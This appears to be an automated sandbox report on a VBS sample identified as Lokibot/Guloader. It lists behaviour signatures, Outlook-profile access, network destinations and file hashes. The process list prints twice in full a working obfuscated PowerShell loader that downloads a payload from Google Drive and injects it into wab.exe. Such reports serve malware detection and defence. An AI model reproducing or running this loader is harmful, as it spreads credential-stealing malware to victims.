Analysis Overview
SHA256
56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
Threat Level: Known bad
The file 56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0.vbs was found to be: Known bad.
Malicious Activity Summary
Lokibot
Guloader,Cloudeye
Blocklisted process makes network request
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Accesses Microsoft Outlook profiles
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
outlook_win_path
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-19 13:44
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 13:44
Reported
2024-04-19 13:47
Platform
win7-20240221-en
Max time kernel
143s
Max time network
146s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1936 set thread context of 2844 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 24.199.107.111:80 | 24.199.107.111 | tcp |
| US | 24.199.107.111:80 | 24.199.107.111 | tcp |
| US | 24.199.107.111:80 | 24.199.107.111 | tcp |
| US | 24.199.107.111:80 | 24.199.107.111 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
| MD5 | 31aa3eda7b2c1243a9d7a328f87e9c71 |
| SHA1 | 67b97b37bd30b9e42f5ff0a6a70a8bcba36ab3d9 |
| SHA256 | d054c976ebb4a059323946189a4ff3db86b270ae5ff5ea63f3aa522ad7284c0d |
| SHA512 | 186884c074f064dcf3bf7dd53deb4babeb7973887c9ed8184e1f1253b2e79cc5b3d697fe65236f76250444c3779699bb93e9bf6b015a28ddcabe833b246b212e |
C:\Users\Admin\AppData\Local\Temp\Rundturens.txt
| MD5 | 39bd0d7206e702ded4c064c967c327dd |
| SHA1 | aacce3246a207e4f958066b206a50d6507e2957f |
| SHA256 | 4f185ff98850db64e2d133689865d1781e9779003a2c812c84e4bc8f1d53e117 |
| SHA512 | 310dacf0b85d7eae361e1e5c256e14cc7db7a6e0847d0a1af1d1e11452da7ad82344acc53a002ba1a8152ee4e8069f7139004ee8c95f65bc8718797b87db19f7 |
memory/1484-330-0x000000001B300000-0x000000001B5E2000-memory.dmp
memory/1484-331-0x0000000002040000-0x0000000002048000-memory.dmp
memory/1484-332-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
memory/1484-334-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1484-333-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1484-335-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1484-336-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
memory/1484-337-0x00000000025D0000-0x0000000002650000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8QC4JSO34LDJFY3TT36D.temp
| MD5 | a229c2525cc50cc05837c475509ecd2e |
| SHA1 | 29690b80127669d740c864a7f39838cb1281a16a |
| SHA256 | cc7d8aefc9f7ef7fa8f17c1188f9c00bf66026fe63f967b616786f3d3d28e7cb |
| SHA512 | 68add81190de9927dbf7df476c01ccfbedf967220649057f2a10108ecf53db4c6b05f85d4b3b5013c4d737615b1960096320d92198c0137e5e7c1cafffc36009 |
memory/1936-342-0x0000000073240000-0x00000000737EB000-memory.dmp
memory/1936-343-0x0000000073240000-0x00000000737EB000-memory.dmp
memory/1936-344-0x00000000026D0000-0x0000000002710000-memory.dmp
memory/1484-345-0x000007FEF5790000-0x000007FEF612D000-memory.dmp
memory/1484-346-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1484-347-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1484-348-0x00000000025D0000-0x0000000002650000-memory.dmp
memory/1936-349-0x00000000026D0000-0x0000000002710000-memory.dmp
C:\Users\Admin\AppData\Roaming\gennemsgnings.Fas
| MD5 | eef3f42f8568ec1d96e3fc1a3174c27f |
